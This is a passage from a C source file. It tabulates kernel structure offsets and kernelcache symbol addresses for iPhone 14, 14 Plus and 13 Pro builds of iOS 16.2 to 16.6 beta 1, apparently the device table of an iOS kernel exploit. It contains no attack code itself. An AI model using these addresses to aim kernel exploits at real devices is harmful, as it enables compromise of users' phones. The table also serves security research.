.pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a44d208, .kernelcache__gPhysBase = 0xfffffff007938100, .kernelcache__gPhysSize = 0xfffffff007938100 + 0x8, .kernelcache__gVirtBase = 0xfffffff0079362d8, .kernelcache__perfmon_devices = 0xfffffff00a48b520, .kernelcache__perfmon_dev_open = 0xfffffff007ef1480, .kernelcache__ptov_table = 0xfffffff0078eb180, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a48a990, .kernelcache__vm_pages = 0xfffffff0078e7ec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ea130, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a48a988, .kernelcache__vn_kqfilter = 0xfffffff007f3dfe8, }, // iOS 16.6 beta 1 // { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:16:18 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8110", .build_version = "20G5026e", .device_id = "iPhone14,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a4fda30, .kernelcache__gPhysBase = 0xfffffff00794c2a8, .kernelcache__gPhysSize = 0xfffffff00794c2a8 + 0x8, .kernelcache__gVirtBase = 0xfffffff00794a460, .kernelcache__perfmon_devices = 0xfffffff00a53d550, .kernelcache__perfmon_dev_open = 0xfffffff007f15b9c, .kernelcache__ptov_table = 0xfffffff0078ff9c0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a53c910, .kernelcache__vm_pages = 0xfffffff0078fc110, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078fe970, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a53c908, .kernelcache__vn_kqfilter = 0xfffffff007f620b8, }, // End iPhone 14 // // Start iPhone 14 Plus // // iOS 16.2 // { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:56 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8110", .build_version = "20C65", .device_id = "iPhone14,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a359190, .kernelcache__gPhysBase = 0xfffffff0078540c8, .kernelcache__gPhysSize = 0xfffffff0078540c8 + 0x8, .kernelcache__gVirtBase = 0xfffffff0078522a8, .kernelcache__perfmon_devices = 0xfffffff00a3943b0, .kernelcache__perfmon_dev_open = 0xfffffff007eccfa8, .kernelcache__ptov_table = 0xfffffff007807370, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a393800, .kernelcache__vm_pages = 0xfffffff007804098, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806330, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3937f8, .kernelcache__vn_kqfilter = 0xfffffff007f1cfd0, }, // iOS 16.3 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8110", .build_version = "20D47", .device_id = "iPhone14,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a365190, .kernelcache__gPhysBase = 0xfffffff0078541b0, .kernelcache__gPhysSize = 0xfffffff0078541b0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007852390, .kernelcache__perfmon_devices = 0xfffffff00a3a03b0, .kernelcache__perfmon_dev_open = 0xfffffff007ed105c, .kernelcache__ptov_table = 0xfffffff0078073b0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a39f800, .kernelcache__vm_pages = 0xfffffff0078040d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806370, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a39f7f8, .kernelcache__vn_kqfilter = 0xfffffff007f21074, }, // iOS 16.3.1 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8110", .build_version = "20D67", .device_id = "iPhone14,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a365190, .kernelcache__gPhysBase = 0xfffffff0078541b0, .kernelcache__gPhysSize = 0xfffffff0078541b0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007852390, .kernelcache__perfmon_devices = 0xfffffff00a3a03b0, .kernelcache__perfmon_dev_open = 0xfffffff007ed105c, .kernelcache__ptov_table = 0xfffffff0078073b0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a39f800, .kernelcache__vm_pages = 0xfffffff0078040d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806370, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a39f7f8, .kernelcache__vn_kqfilter = 0xfffffff007f21074, }, // iOS 16.4 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:43:00 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8110", .build_version = "20E247", .device_id = "iPhone14,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a441208, .kernelcache__gPhysBase = 0xfffffff007933fc0, .kernelcache__gPhysSize = 0xfffffff007933fc0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007932198, .kernelcache__perfmon_devices = 0xfffffff00a47f520, .kernelcache__perfmon_dev_open = 0xfffffff007eed210, .kernelcache__ptov_table = 0xfffffff0078e7180, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a47e990, .kernelcache__vm_pages = 0xfffffff0078e3ec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e6130, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a47e988, .kernelcache__vn_kqfilter = 0xfffffff007f39ae0, }, // iOS 16.4.1 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:43:00 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8110", .build_version = "20E252", .device_id = "iPhone14,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a441208, .kernelcache__gPhysBase = 0xfffffff007933fc0, .kernelcache__gPhysSize = 0xfffffff007933fc0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007932198, .kernelcache__perfmon_devices = 0xfffffff00a47f520, .kernelcache__perfmon_dev_open = 0xfffffff007eed210, .kernelcache__ptov_table = 0xfffffff0078e7180, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a47e990, .kernelcache__vm_pages = 0xfffffff0078e3ec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e6130, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a47e988, .kernelcache__vn_kqfilter = 0xfffffff007f39ae0, }, // iOS 16.5 // { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:09:37 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8110", .build_version = "20F66", .device_id = "iPhone14,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a44d208, .kernelcache__gPhysBase = 0xfffffff007938100, .kernelcache__gPhysSize = 0xfffffff007938100 + 0x8, .kernelcache__gVirtBase = 0xfffffff0079362d8, .kernelcache__perfmon_devices = 0xfffffff00a48b520, .kernelcache__perfmon_dev_open = 0xfffffff007ef1480, .kernelcache__ptov_table = 0xfffffff0078eb180, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a48a990, .kernelcache__vm_pages = 0xfffffff0078e7ec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ea130, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a48a988, .kernelcache__vn_kqfilter = 0xfffffff007f3dfe8, }, // iOS 16.6 beta 1 // { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:16:18 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8110", .build_version = "20G5026e", .device_id = "iPhone14,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a4fda30, .kernelcache__gPhysBase = 0xfffffff00794c2a8, .kernelcache__gPhysSize = 0xfffffff00794c2a8 + 0x8, .kernelcache__gVirtBase = 0xfffffff00794a460, .kernelcache__perfmon_devices = 0xfffffff00a53d550, .kernelcache__perfmon_dev_open = 0xfffffff007f15b9c, .kernelcache__ptov_table = 0xfffffff0078ff9c0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a53c910, .kernelcache__vm_pages = 0xfffffff0078fc110, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078fe970, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a53c908, .kernelcache__vn_kqfilter = 0xfffffff007f620b8, }, // End iPhone 14 Plus // // Start iPhone 13 Pro // // iOS 16.2 // { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:56 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8110", .build_version = "20C65", .device_id = "iPhone14,2", .fileglob__fg_ops = 0x28, 